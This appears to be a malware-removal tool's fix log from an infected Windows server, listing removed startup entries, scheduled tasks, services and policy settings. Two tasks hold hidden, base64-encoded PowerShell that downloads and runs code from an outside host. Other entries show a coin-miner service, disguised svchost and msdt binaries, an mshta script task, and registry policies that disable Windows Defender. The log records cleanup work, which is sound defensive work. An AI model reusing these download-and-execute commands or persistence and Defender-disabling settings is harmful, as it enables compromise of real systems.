[main] LastFixID=3 Total=45 LastBackupID=45 [1] Name=O4 - HKLM\..\Run: [MRT] = C:\Windows\system32\MRT.exe /R Date=2024/06/18 - 07:02 FixID=1 [2] Name=O4 - HKU\S-1-5-18\..\Run: [GoogleDriveFS] = C:\Program Files\Google\Drive File Stream\92.0.0.0\GoogleDriveFS.exe --startup_mode (User 'LocalSystem') Date=2024/06/18 - 07:03 FixID=1 [3] Name=O4 - HKU\S-1-5-19\..\Run: [GoogleDriveFS] = C:\Program Files\Google\Drive File Stream\92.0.0.0\GoogleDriveFS.exe --startup_mode (User 'Local service') Date=2024/06/18 - 07:03 FixID=1 [4] Name=O4 - HKU\S-1-5-20\..\Run: [GoogleDriveFS] = C:\Program Files\Google\Drive File Stream\92.0.0.0\GoogleDriveFS.exe --startup_mode (User 'Network service') Date=2024/06/18 - 07:04 FixID=1 [5] Name=O7 - AutoLogon: HKLM\..\Winlogon: WIN-NK8E5PF0OHH\Administrator Date=2024/06/18 - 07:04 FixID=1 [6] Name=O7 - IPSec: Name: win (2024/06/18) - {41ac28af-b5d9-4505-992b-b1ca5870a588} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block Date=2024/06/18 - 07:04 FixID=1 [7] Name=O7 - IPSec: Name: win (2024/06/18) - {41ac28af-b5d9-4505-992b-b1ca5870a588} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block Date=2024/06/18 - 07:04 FixID=1 [8] Name=O7 - IPSec: Name: win (2024/06/18) - {41ac28af-b5d9-4505-992b-b1ca5870a588} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block Date=2024/06/18 - 07:04 FixID=1 [9] Name=O7 - IPSec: Name: win (2024/06/18) - {41ac28af-b5d9-4505-992b-b1ca5870a588} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block Date=2024/06/18 - 07:04 FixID=1 [10] Name=O7 - IPSec: Name: win (2024/06/18) - {41ac28af-b5d9-4505-992b-b1ca5870a588} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block Date=2024/06/18 - 07:04 FixID=1 [11] Name=O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Features: [TamperProtection] = (Error code: 2) Date=2024/06/18 - 07:04 FixID=1 [12] Name=O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Real-Time Protection: [DisableRealtimeMonitoring] = 1 Date=2024/06/18 - 07:04 FixID=1 [13] Name=O7 - Policy: HKLM\Software\Policies\Microsoft\Windows Defender: [DisableAntiSpyware] = 1 Date=2024/06/18 - 07:04 FixID=1 [14] Name=O7 - Policy: HKLM\Software\Policies\Microsoft\Windows Defender: [DisableAntiVirus] = 1 Date=2024/06/18 - 07:04 FixID=1 [15] Name=O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Se&nd to OneNote: (default) = C:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll (file missing) Date=2024/06/18 - 07:04 FixID=1 [16] Name=O21 - HKLM\..\ShellIconOverlayIdentifiers\ - C:\Program Files\Google\Drive File Stream\92.0.0.0\drivefsext.dll Date=2024/06/18 - 07:04 FixID=1 [17] Name=O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleSystem\GoogleUpdater (empty) Date=2024/06/18 - 07:04 FixID=1 [18] Name=O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MySQL (empty) Date=2024/06/18 - 07:04 FixID=1 [19] Name=O22 - Tasks: (disabled) \Microsoft\Windows\PLA\Server Manager Performance Monitor - C:\Windows\system32\rundll32.exe C:\Windows\system32\pla.dll,PlaHost "Server Manager Performance Monitor" "$(Arg0)" (Microsoft) Date=2024/06/18 - 07:04 FixID=1 [20] Name=O22 - Tasks: (disabled) \Microsoft\Windows\Server Initial Configuration Task - C:\Windows\system32\srvinitconfig.exe /disableconfigtask (Microsoft) Date=2024/06/18 - 07:04 FixID=1 [21] Name=O22 - Tasks: (disabled) \Microsoft\Windows\Software Inventory Logging\Collection - C:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd publish (Microsoft) Date=2024/06/18 - 07:04 FixID=1 [22] Name=O22 - Tasks: \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (Microsoft) Date=2024/06/18 - 07:04 FixID=1 [23] Name=O22 - Tasks: \Microsoft\Windows\AppID\Numbers - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZAAuADAAMAAwADAAbwAuAHgAeQB6ADoAOAA4AC8AawAnACkA Date=2024/06/18 - 07:04 FixID=1 [24] Name=O22 - Tasks: \Microsoft\Windows\UPnP\LsaIso - C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\LsaIso.exe Date=2024/06/18 - 07:04 FixID=1 [25] Name=O22 - Tasks: \Microsoft\Windows\UPnP\msdt - C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\msdt.exe Date=2024/06/18 - 07:04 FixID=1 [26] Name=O22 - Tasks: ChromeUpdates - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZAAuADAAMAAwADAAbwAuAHgAeQB6ADoAOAA4AC8AYwAnACkA Date=2024/06/18 - 07:04 FixID=1 [27] Name=O22 - Tasks: sihost - C:\Users\Administrator\AppData\Roaming\XenoManager\javaw.exe Date=2024/06/18 - 07:04 FixID=1 [28] Name=O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Date=2024/06/18 - 07:04 FixID=1 [29] Name=O23 - Service R2: netipers - C:\Windows\IME\svchost.exe Date=2024/06/18 - 07:04 FixID=1 [30] Name=O23 - Service R2: System Remote Data Simulation Layer - (Servercy) - C:\Windows\System32\svchost.exe -k "Servercy"; "ServiceDll" = C:\Windows\system32\58912734.txt (file missing) Date=2024/06/18 - 07:04 FixID=1 [31] Name=O23 - Service R2: Windows Test My Server Version 4.0 - (Windows Test My Version 4.0) - C:\Windows\system32\nbubrqa.exe (file missing) Date=2024/06/18 - 07:04 FixID=1 [32] Name=O23 - Service S2: dom_miner - C:\Users\Administrator\dom\dsm.exe Date=2024/06/18 - 07:04 FixID=1 [33] Name=O23 - Service S2: windowsupdate - (WindowsUpdate) - C:\Windows\system32\Team\svchost.exe (file missing) Date=2024/06/18 - 07:04 FixID=1 [34] Name=O4 - HKLM\..\SafeBoot: [AlternateShell] = (no file) (disabled) Date=2024/06/19 - 16:28 FixID=2 [35] Name=O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Features: [TamperProtection] = (Error code: 2) Date=2024/06/19 - 16:28 FixID=2 [36] Name=O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Real-Time Protection: [DisableRealtimeMonitoring] = 1 Date=2024/06/19 - 16:28 FixID=2 [37] Name=O7 - Policy: HKLM\Software\Policies\Microsoft\Windows Defender: [DisableAntiSpyware] = 1 Date=2024/06/19 - 16:28 FixID=2 [38] Name=O7 - Policy: HKLM\Software\Policies\Microsoft\Windows Defender: [DisableAntiVirus] = 1 Date=2024/06/19 - 16:28 FixID=2 [39] Name=O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleSystem (empty) Date=2024/06/19 - 16:28 FixID=2 [40] Name=O22 - Tasks: \Network\AccessProtection - C:\Windows\System32\mshta.exe C:\ProgramData\scripts\RemoteAssistanceSvc.hta Date=2024/06/19 - 16:28 FixID=2 [41] Name=O22 - Tasks: \Python\UpdateService - C:\ProgramData\Python\pythonw.exe -m pip_update.pyd 20 30 (file missing) Date=2024/06/19 - 16:28 FixID=2 [42] Name=O23 - Service S2: dom_miner - C:\Users\Administrator\dom\dsm.exe (file missing) Date=2024/06/19 - 16:28 FixID=2 [43] Name=O7 - Policy: HKLM\Software\Microsoft\Windows Defender\Features: [TamperProtection] = (Error code: 2) Date=2024/06/19 - 16:59 FixID=3 [44] Name=O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Network (empty) Date=2024/06/19 - 16:59 FixID=3 [45] Name=O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Python (empty) Date=2024/06/19 - 16:59 FixID=3